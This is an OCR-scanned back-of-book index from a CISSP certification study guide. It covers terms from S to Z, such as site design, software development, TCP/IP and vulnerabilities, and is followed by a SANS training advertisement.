HIPAA, 14, 40, 42-43, 54-55, 97 
labels, 82 
offshoring, 54-55 
retention and storage, 84-85 
Sensitive media, 84-85 
Separation of duties, 108-109, 349-350 
Sequential memory, properties, 87 
Serial Line Internet Protocol. See SLIP 
Server rooms, 198-199, 388-389 
Server-side attacks, 139-140 
Service. See also Availability 
Service Level Agreements. See SLA 
Servicemarks, 31-32 
Service Orientated Architecture. See SOA 
Service providers 
contractual security, 44-45 
SLA, 44, 375-376 
Service Set Identifiers. See SSID 
SESAME (Secure European System for 
Applications in a Multi-vendor 
Environment), 318 
Session Initiation Protocol. See SIP 
Session Layer (Layer 5), 224, 274 
Session management 
KERBEROS, 315-317 
Single Sign-On, 3 1 1 
Setuid (set user ID) programs, 130-131 
Shadowing, databases, 415, 455^4-56 
Shared demarc areas, 198 
Shared tenancies, 197-198 
Shareware, 435 
Sharia law, 21 

SHA (Secure Hash Algorithms), 171, 176-178 
Shell code, 431 

Shielded twisted pair. See STP 
Shielding, Faraday Cages, 263 
ShiftRows, AES, 166 
Shortages, personnel, 390-391 
Shoulder surfing, 190 
Shredding 
data, 91 
hard copy, 92 
Side-channel attacks, 175 
SIEM (Security Information and Event 
Management), 366-367, 461-462 


SIGABA cipher machine, 157-158 
Simple Integrity Axiom, 107 
Simple Mail Transfer Protocol. See SMTP 
Simple Network Management Protocol. See SNMP 
Simple Object Access Protocol. See SOAP 
Simple Security Property, 104, 106 
Simplex communication, 220 
Simulation tests. Disaster Recovery Plans, 418 
Single DES, 163-164 
Single-interlock sprinkler systems, 2 1 1 
Single Loss Expectancy. See SLE 
Single Sign-On. See SSO 
SIP (Session Initiation Protocol), VoIP, 258 
Site design 
alarms, 193 
bollards, 184-185 
CCTV, 185-187 
configuration issues, 197-199 
doors and windows, 194 
environmental controls, 200-21 1 
evacuations, 204-205 
fences, 183 

fire suppression, 205-21 1 
gates, 184 

heat, smoke and flame detectors, 203-204 
HVAC, 202-203, 388-389 
lights, 185 
locks, 187-190 

magnetic stripe cards, 190-192 
mantraps and turnstiles, 192 
motion detectors, 193 
perimeter defenses, 183-196 
restricted areas and escorts, 196 
smart cards, 190-192, 262-263 
topography, 196-197 
walls, floors and ceilings, 194-195 
Site marking, 197 
Site selection, 196-197 
Skeleton keys, 188 
Slack space, forensics, 354 
SLA (Service Level Agreements), 44, 375-376 
SLE (Single Loss Expectancy), risk analysis, 62 
SLIP (Serial Line Internet Protocol), VPN, 280-281 
Smart cards, 190-192, 262-263 
Smart phones, 286 

S/MIME (secure Multipurpose Internet Mail 
Extensions), 181 
Smoke detectors, 203 
SMP (symmetric multiprocessing), 122 
SMTP (Simple Mail Transfer Protocol), 222, 243 
Sniffers, 264, 296 

SNMP (Simple Network Management Protocol), 
244-245 
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SOAP (Simple Object Access Protocol), 142 
SOA (Service Orientated Architecture), 142 
Social engineering 
cryptographic attacks, 172 
penetration testing, 330 
phishing, 73-74 
phreaking, 90-91 

tailgating and piggybacking, 103, 192 
Socket pairs, 238 
Sockets, definition, 238 
SOCKS firewalls, 274 
Soda acid, fire suppression, 208 
Software 

acquired, security impact assessment, 468-469 

antivirus, 368-369 

artificial neural networks, 470-471 

Bayesian filtering, 471^-72 

change management, 449-450 

code repository security, 448 

combinatorial testing, 338 

compilers, interpreters & bytecode, 43 1 

copyright, 34 

development, 429-477 

acceptance testing, 467-468 
Agile methods, 439-441 
APIs, 449 

Artificial Intelligence, 469-472 

Capability Maturity Model, 430, 462, 466-467 

computer-aided, 434 

databases, 450-456 

DevOps, 450 

disclosure of vulnerabilities, 466 
exam objectives summary, 473 
Extreme Programming, 429, 44 1 
fourth-generation languages, 433 
Genetic Algorithms, 472 
integrated product teams, 447 
methods, 436^-50 

Object-Orientated Analysis and Design, 
461-462 

Object-Orientated Programming, 429, 
431^-33, 456-461 
privilege escalation, 465 
procedural languages, 429, 43 1—433 
programming concepts, 430^136 
prototyping, 442-443 
Rapid Application Development, 442 
Sashimi Model, 438-440 
Scrum, 440-441 
security effectiveness, 462^169 
self test, 473^475, 515-520 
Spiral Model, 429, 441-442 
Systems Development Life Cycle, 429, 443^447 


top-down vs. bottom-up, 434 
vulnerabilities, 462^166 
Waterfall Model, 429, 436-439 
escrow, 4 1 6-4 1 7 , 447 
expert systems, 469-470 
forensic analysis, 356 
fuzzing, 337-338 
interface testing, 339 
licenses, 34, 435 — 436 
misuse case testing, 338-339 
Objects, 429 
patch management, 372 
piracy, 35-36 

privileged programs, 1 29-1 3 1 
programming concepts, 430-436 
public release formats, 434^136 
secure architectures, 127-131 
security assessment and testing, 335-340 
source code and assemblers, 430-43 1 
test coverage analysis, 339 
testing levels, 337 
tests analysis, 339-340 
thin client applications, 135 
vulnerabilities, 462-466 
whitelisting, 369 

Software-defined networking. See SDN 
Software as a Service. See SaaS 
Software standards, policies, 5 1 
Solid State Drives. See SSDs 
Something you are (type 3 Authentication), 
304-308 

Something you have (type 2 Authentication), 
301-303 

Something you know (type 1 Authentication), 
294-301 

SONET (Synchronous Optical Networking), 254 
Source code, 430-43 1 , 448 
S outhbridge/ICH , 120 
SOX (Sarbanes-Oxley Act of 2002), 40 
SPAN (Switched Port Analyzer) ports, 266 
Spartan Scy tales, 150 
Spear phishing, 73-74 
Speed 

Ethernet, 248 

fiber optic networks, 248 

UTP cabling, 246 

Spiral Model, concepts, 429, 441^142 

SPI (Security Parameter Index), 1 80 

Split horizon, RIP, 270 

Spring-bolt locks, 188-189 

Sprinkler systems, 210-21 1 

SQL (Structured Query Language), 45 1 , 454 

SRAM (Static Random Access Memory), 87, 88 
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SRTP (Secure Real-time Transport Protocol), 258 
SSDs (Solid State Drives), 81, 89-90 
SSH (Secure Shell), 243 
SS1D (Service Set Identifiers), 802, 1 1, 261 
SSL (Secure Sockets Layer), 179, 282 
SSO (Single Sign-On), 309, 310-318 
Federated Identity Management, 312 
KERBEROS, 314-318 
SESAME, 318 
Standards 

data security controls, 93-96 
policies, 51, 52 
tailoring and scoping, 8 1 
WAN circuits, 254. See also ISO...; NIST 
Star Integrity Axiom (* Integrity Axiom), 107-108 
Star Security Property (* security Property), 106 
Star topology, LANs, 252-253 
State, AES data, 166 
Stateful firewalls, 219, 272-273 
Stateless autoconfiguration, IPv6, 23 1 
State machine model, 105 
Static build-up, environmental controls, 203 
Static NAT, 234-235 
Static passwords, 295 

Static Random Access Memory. See SRAM 

Static routes, LANs, 267 

Static testing of software, 335-336 

Statutory financial damages, 23 

Stealth viruses, 138 

Steganography, 182-183 

Storage 

backups, 84-85, 97-98, 378-381, 412-417, 456 
Full-Disk Encryption, 96-97, 126, 149, 370 
information protection, 84-85 
media, 84-85, 90-92, 97-98, 353-355 
RAID, 348, 378-381 
remanence, 81, 87-90, 91 
removable media, 145, 199-200, 369-370 
sensitive information, 84 
tapes, 87,91,96-97,415 
vital records, 41 1 
Storage Area Networks. See SAN 
Storage channels, 136 

STP (shielded twisted pair) cabling, 201-202 

Stream ciphers, 160 

Strength of cryptography, 147 

Strike plates, 188 

Strikes, 391 

Striping, RAID, 348, 379-381 
Strong authentication, 295, 303 
Strong cryptography, 147 
Strong passwords, 5 1 
Strong tranquility property, 106 


Structured Query Language. See SQL 
Structured walkthroughs, Disaster Recovery 
Plans, 418 
SubBytes, AES, 167 
Subjects 
access control 
Bell-LaPadula, 106 
Biba Model, 107-108 
Clark-Wilson, 108-109 
Graham-Denning model, 1 1 1-1 12 
Harrison-Ruzzo-Ullman model, 112 
lattice-based access controls, 106-107 
matrices, 110-112 
modes of system operation, 112-113 
noninterference model, 109-110 
state machine models, 105 
Take-Grant Protection Model, 110 
Zachman Framework, 111 
bounds, 106-107 
concepts, 11, 18 
file permissions, 128-131 
security domains, 1 17 
Subscription services, continuity of 
operations, 407 

Substitution, cryptography, 147, 182-183 
Supplicants, EAP, 279 
Supply chain management, 403-404 
Suppression of fires, 205-21 1 
Surge protectors, 200 
Swapping, virtual memory, 124-125 
Switched Port Analyzer ports. See SPAN ports 
Switches, 219, 264-266 
Symmetric Digital Subscriber Line. See SDSL 
Symmetric encryption, 160-168 
AES, 165-168, 181,262 
Blowfish and Twofish, 168 
chaining/feedback, 1 6 1 
Clipper Chip, 182 
definition, 104 
DES, 161-165 
IDEA, 165 

initialization vectors, 160-161 
RC5 and RC6, 168 
SSL and TLS, 179 
stream and block ciphers, 160 
tradeoffs with asymmetric methods, 169-170 
Symmetric multiprocessing. See SMP 
Synchronous Data Link Control. See SDLC 
Synchronous dynamic tokens, 302-303 
Synchronous Optical Networking. See SONET 
SYN flags, 238-239 

Synthetic transactions, software testing, 336-337 
System calls, ring model, 118 
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System defenses, 199-200 
System hardening, IPv6 services, 232-233 
System high mode of operation, 112 
System integrity 
cornerstone concepts, 14 
penetration testing, 331-332 
System memory, cache, 87-88 
System Owners, information security, 85-86 
Systems 

access control models, 104-113 
access control testing, 330-335 
address space layout randomization, 126-127 
backdoors, 137 

backups, 84-86, 97-98, 376-381, 412-417, 456 

baselining, 371-372 

binary images, 353 

change management, 373-375 

communications failures, 391-392 

compartmented mode, 113 

configuration management, 371-373, 449-450 

Content Management Systems, 449^150 

continuous monitoring, 367 

countermeasures, 145-146 

covert channels, 136-137 

CPUs, 120-123 

cryptography, 146-183 

databases, security, 142-145 

Data Execution Prevention, 126-127 

Data Loss Prevention, 367-368 

dedicated mode, 112 

emanations, 136 

evaluation, 113-116 

fault tolerance, 376-382 

grid computing, 134 

hardware segmentation, 1 24 

Highly Available clusters, 382, 416 

honeypots & honeynets, 370-37 1 

interface testing, 339 

malware vulnerabilities, 137-139 

memory protection, 123-126 

modes of operation, 112-113 

motherboards, 119-120 

multilevel mode, 1 13 

open and closed, 119 

patch deployment, 372 

penetration testing, 330-332 

port controls, 199-200 

process isolation, 124 

RAID, 378-381 

redundancy, 382, 405^106 

reference monitor, 128 

secure design concepts, 116-119 

secure hardware architecture, 119-127 


secure operating system and software 
architecture, 127-131 
server- side attacks, 139-140 
software escrow, 4 1 6-4 1 7 
software testing, 335-340 
system high mode, 112 
as a target of crimes, 30, 68-74 
thin clients, 135 

as tools in a crime, 30-31, 68-74 
TPM, 126 

user and file permissions, 128-131 
virtualization, 131-132 
virtual memory, 124-125 
vulnerabilities and threats, 136-146 
vulnerability management, 372-376 
watchdog timers, 122 
web architecture vulnerabilities, 140-142 
WORM storage, 126 

Systems Development Life Cycle. See SDLC 
System units, architecture, 119 

T 

T1/T3 circuits, 254 
Tables, relational databases, 45 1 — 452 
Tabletop exercises, Disaster Recovery Plans, 418 
TACACS/TACACS+ (Terminal Access Controller 
Access Control System), 319 
Tagged Image File Format. See TIFF 
Tailgating, 103, 192 
Tailoring data security controls, 96 
Tailoring standards, 8 1 
Take-Grant Protection Model, 1 10 
Taking the exam, 4-9 
Tangible assets, 61 
Tape storage, 87, 91, 96-97, 415 
Taps, networks, 266-267 
TAP (Test Access Ports), 236 
Targeted attacks, 390 
Task-based access control, 323 
Tasks, CPUs, 121-122 
TCO (Total Cost of Ownership), 51, 62-63 
TCP/IP (Transmission Control Protocol/Intemet 
Protocol) model, 219, 225-245 
Application Layer, 226, 241-245 
ARP and RARP, 227, 235-236 
BOOTP, 135, 245 
DHCP, 135, 231,245 
DNS, 244 

encapsulation and de-multiplexing, 226 
headers, 226, 228, 229-230, 237, 239 
Host-to-Host Transport Layer, 226, 237-241 
HTTP and HTTPS, 179, 245 
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TCP/IP (Transmission Control Protocol/Intemet 
Protocol) model (cont.) 

ICMP, 228, 240-241 

Internet Layer, 225-226, 227-241 

IPv4, 227-229, 232-234 

IPv6, 227, 229-232 

Network Access Layer, 225, 227 

SANs, 257 

SMTP, POP and IMAP, 243 
SNMP, 244-245 
SSH, 243 
TCP, 237-239 
UDP, 239 

unicast, multicast & broadcast traffic, 236-237 
TCP (Transmission Control Protocol), 237-239, 
272-274, 364-365 

TCSEC (Trusted Computer System Evaluation 
Criteria), 104, 113-115 
TD (Top-Down) programming, 434 
Team activation, disaster recovery, 393 
Team building, BCP/DRP development, 397-398 
Technical controls 
802, IX, 146 
removable media, 145 
Telecommunications management, 404-405 
Telecommuting, 282-287 
Telnet, 242 

Temperature failures, 388-389 

TEMPEST, 136 

Templates for biometrics, 304 

Temporal Key Integrity Protocol. See TKIP 

Tenancies, shared, 197-198 

Ten Commandments of Computer Ethics , 48 

Tensions, security management, 14 

Terminal Access Controller Access Control System. 

See TACACS/TACACS+ 

Terminals, 277 

Termination of employees, 53 
Terms of copyright, 33 
Terrorism, 389 

Test coverage analysis, software, 339 
Testing 

backup power, 388-389 
disaster recovery plans, 417—419 
HVAC, 388-389 
penetration testing, 44-45, 331 
software, 335-340 

TFTP (Trivial File Transfer Protocol), 243 
TGS (Ticket Granting Service), KERBEROS, 
315-318 

TGT (Ticket Granting Ticket), KERBEROS, 
315-318 

Thicknet, 247, 248 


Thin clients, 135 
Thinnet, 247, 248 
Third parties 

access control assessments, 333 
audits, 44-45 

penetration testing, 44-45, 330-332 
security, 43-46 
SLA, 44, 375-376 

software security impact assessment, 468^169 
vendor governance, 45 
Threads, processing, 121-122 
Threats 
definition, 11 
risk analysis, 58-60 
Three pass method, examinations, 9 
Throughput, biometrics, 305 
Ticket Granting Service. See TGS 
Ticket Granting Ticket. See TGT 
TIFF (Tagged Image File Format), 224 
Time-based synchronous dynamic tokens, 302-303 
Time of Check/Time of Use attacks. See TOCTOU 
Time Exceed messages, 241 
Time multiplexing, 124 
Time to Live. See TTL 
Timing channels, 137 

TKIP (Temporal Key Integrity Protocol), 262 
TLS (Transport Layer Security), 179, 280, 282, 286 
TNI (Trusted Network Interpretation), 1 14 
TOCTOU (Time of Check/Time of Use) attacks, 
464-465 

Token bus, FDDI, 250 
Token Ring, 249 
Tokens, access control, 301-303 
Top-Down. See TD 

Topography and site selection, 196-197 
Topologies of LANs, 250-253 
Top Secret object labeling, 82 
Total Cost of Ownership. See TCO 
TPM (trusted platform modules), 126 
TP (transformation procedure), Clark-Wilson, 108 
Traceability matrix, 336 
Traceroute, 241 
Trademarks, 31-32, 35 
Trade secrets, 34-35 
Training of personnel, 52, 419-420 
Trans-border flows of data, 38, 39 
Transferring risk, 66 
Transformation procedure. See TP 
Transmission Control Protocol. See TCP 
Transmission Control Protocol/Internet Protocol. 
See TCP/IP 

Transparent virtualization, 131 
Transportation of media, 97-98 
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Transport Layer 

Layer 4 OSI model, 224, 237-238, 239, 271-277 
TCP/IP, 226, 237-241 
Transport Layer Security. See TLS 
Transport mode, IPsec, 180, 281-282 
Transposition, cryptography, 147 
Travel safety, 205 
Tree architecture, LANs, 251 
TRIM command, SSDs, 89-90 
Triple DES, 164-165 
Tripwire, 365 

Trivial File Transfer Protocol. See TFTP 
Trojan horse programs, 72, 138 
True negative/positive events, intrusion detection, 
363-364 

Trusted Computer System Evaluation Criteria. 

See TCSEC 

Trusted Network Interpretation. See TNI 
Trusted platform modules. See TPM 
Trustworthiness and clearance, 83 
Truth tables, 149 

TRW-SPS (TRW Software Productivity 
System), 442 

TTL (Time to Live) fields, traceroute, 241 
Tunneling 

dual stack systems, 23 1 
IPsec, 180, 281-282 
Tuples, relational databases, 45 1 
Turnstiles, 192 
Twofish, 168 

Two pass method, examinations, 8-9 
Type 1 Authentication (something you know), 
294-301 

Type 2 Authentication (something you have), 
301-303 

Type 3 Authentication (something you are), 
304-308 

Type I errors, biometrics, 305 
Type II errors, biometrics, 305 
Typosquatting, concepts, 35-36 

U 

UDI (unconstrained data items), 108 

UDP (User Datagram Program), 225-226, 239, 272 

Ultrasonic motion detectors, 193 

Unallocated space, forensics, 353 

Unconstrained data items. See UDI 

Unicast traffic, 236 

Uninterruptible Power Supplies. See UPSs 
United States. See US 
Unit testing, software, 337 
Universal Serial Bus. See USB 


UNIX 

file authorizations, 16-17 
password hashes, 296 
permissions, 128-129 
privileged programs, 129-131 
salts, 300 

virtual memory, 125 

Unlicensed bands, wireless communications, 259 
Unmodified Waterfall Model, 436-438 
Unregistered trademarks, 31-32 
Unshielded twisted pair cabling. See UTP 
UPSs (Uninterruptible Power Supplies), 197, 201, 
388-389 
URG flags, 238 

USB (Universal Serial Bus) port controls, 199-200 
U.S. Department of Defense. See DoD 
Use limitation principles, OECD privacy 
guidelines, 37 

User Datagram Program. See UDP 

Usernames, 15-16 

Users 

domain separation, 1 17 
entitlements, 311-312 
information security, 86 
ring model, 117-118 
secure architecture, 128-131 
US (United States) 
breach notification laws, 43 
EU-US Safe Harbor Agreement, 38 
the Orange Book, 113-115 
PATRIOT Act, 40, 42 
privacy laws, 37-38 
the Red Book/TNI, 1 14 
security laws and regulations, 39^-3 
Sensitive Compartmented Information, 82-83 
Utilities management, 197, 405 
UTP (unshielded twisted pair) cabling, 201-202, 
220, 246-247 

V 

Vacations, forced, 351 
Vanderpool. See Intel VT 
Variable bounds checking, 463-464 
VDSL (Very High Rate Digital Subscriber Line), 
283 

Vehicle gates, 184 
Velcro, 32 
Vendors 
governance, 45 
security issues, 53-54 
VENONA, 156 
Ventilation. See HVAC 
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Vemam Ciphers, 156 

Version control, BCP/DRP policies, 421 

Vertical escalation, 465 

Very High Rate Digital Subscriber Line. See VDSL 
Views, databases, 453 
Vigenere Ciphers, 151-152 
Violations of policy, disciplinary processes, 17, 53 
Virtual guests, hypervisor mode, 118 
Virtualization, 103, 118, 131-132, 265-266, 
284-285 

Virtualization escape. See VMEscape 

Virtual LANs. See VLANs 

Virtual memory, 124-125 

Virtual Network Computing. See VNC 

Virtual Private Networks. See VPN 

Virtual SANs (virtual Storage Area Networks), 257 

Viruses, 137-138, 139, 368-369 

Vishing, 74 

Vital records storage, 411 
VLANs (Virtual LANs), 264-266 
VMEscape (virtualization escape), 132 
VNC (Virtual Network Computing), 285 
Voice over IP. See VoIP 
Voiceprints, 308 

VoIP (voice over IP), 74, 222, 257-258 

Volatile memory, 87-88 

VPN (Virtual Private Networks), 179-181, 

280-282 
Vulnerabilities 
applets, 141 
backdoors, 137 
client-side attacks, 140 
covert channels, 136-137 
databases, 142-145 
definition, 1 1 
disclosure, 466 
DNS, 244 
emanations, 136 
KERBEROS, 317-318 
malware, 137-139 
management, 372-373 
mobile device attacks, 145-146 
risk analysis, 58-60 
server-side attacks, 139-140 
Single Sign-On, 310 
site design and configuration, 197-199 
software, 462-466 
systems engineering, 136-146 
VoIP, 258 

web architecture, 140-142 
zero day, 373, 466 
Vulnerability scanning, 332, 373 


W 

Waiting times, retaking the exam, 9 
Walkthrough, Disaster Recovery Plans, 418 
Walkthrough drills. Disaster Recovery 
Plans, 418 

Walls, design, 194-195 

WANs (Wide Area Networks), 221, 253-256 

WAP (Wireless Application Protocol), 

286-287 

Warded locks, 188 
War dialing, 330 
Warfare, 389 
Warm sites, 406 

Was senaar Arrangement, 39, 160 
Watchdog timers, CPUs, 122 
Water, fire suppression, 207-208, 210-21 1 
Waterfall Model, software development, 429, 
436^139 

WDM (Wavelength Division Multiplexing), 248 

Weaknesses. See Vulnerabilities 

Weak tranquility property, 106 

Web architecture, attacks, 140-142 

Web Services Description Language. See WSDL 

Web of trust model, PGP, 181 

Well-Formed Transactions, 108 

WEP (Wired Equivalency Protocol), 261 

Wet chemicals, fire suppression, 208 

Wet pipe sprinkler systems, 210 

Wheel Cyphers, 153-154 

White box software testing, 336 

White hats, 69 

Whitelisting applications, 369 
Whole-disk encryption, 96-97, 126, 149, 370 
Wide Area Networks. See WANs 
Wi-Fi Protected Access 2. See WPA2 
Windows 

Active Directory Domains, 320 
management of passwords, 300-301 
NTFS permissions, 129-130 
Object Request Brokers, 460 
password hashes, 296 
ring model, 1 1 8 
security, 194 
Wiping data, 9 1 

Wired Equivalency Protocol. See WEP 
Wireless Application Protocol. See WAP 
Wireless Local Area Networks. See WLANs 
Wireless Markup Language. See WML 
Wireless Transport Layer Security. See WTLS 
Wiring closet security, 198 
WLANs (Wireless Local Area Networks), 146, 
259-262, 279-280 
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WML (Wireless Markup Language), 287 
Work factors, 147 
Work Recovery Time. See WRT 
Worms, malware, 58-59, 138, 139 
WORM (Write Once Read Many) media, 
92, 126 

WPA2 (Wi-Fi Protected Access 2), 262 
Write Once Read Many. See WORM 
Writing up, 104-105 
WRT (Work Recovery Time), 401, 402 
WSDL (Web Services Description 
Language), 142 

WTLS (Wireless Transport Layer 
Security), 286 


x 

X, 25, 255 

XML (Extensible Markup Language), 142 
XOR (Exclusive Or), 149 
XP (Extreme Programming), 429, 441 
XSRF (Cross-Site Request Forgery), 465 
XSS (Cross-Site Scripting), 465 

z 

Zachman Framework, 1 1 1 
Zero day vulnerabilities and exploits, 373, 466 
Zero-knowledge tests, penetration testing, 330 
Zombies. See RATs 
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world-class instruction from top-rated SANS instructors. 
Live training events are held throughout the world. 
Visit sans.org/mgt4 1 4 to learn more. 


Complete SANS' MGT4I4 course online via OnDemand 
or vLive. Both online training formats provide you with 
extended access to your course, subject-matter expert 
support, all books and materials, and labs and training 
tools to reinforce your learning. And both allow you to 
complete your training anywhere, anytime. 



“Thanks to Eric, the CISSP mountain 
is now a manageable hill ” 

-Della Wilcox, Pinnacle Pinnacle Bancorp 


(You are responsible for 
registration and exam fees.) 


Use SANS vLive to get twelve live online sessions 
with your instructor as well as six months of online 
access to your course materials and archives. 


Use SANS OnDemand to get 
24/7 access to your course 
archives for four months. 


knowledge is dissected into its critical components, 
and those components are then discussed in terms of 
their relationship with one another and with other 


NOTE: The official (ISC) 2 courseware and the CISSP® exam 
are NOT provided as part the training. 


To take advantage of the 
Free Retake Offer: 

1 . Register at sans.org/mgt4 1 4 

2. Pick a training option 

3. At checkout, enter the 
registration promo code: 
4I4PR0 


‘Eligibility: CIS (MS-ISAC), EDUs (REN-ISAC), and Voucher program members are not eligible to participate. 

NOTE: All of SANS’ delivery methods are available for initial sign-up for program; retakes are restricted to the following delivery methods: OnDemand, vLive, and Simulcast. 



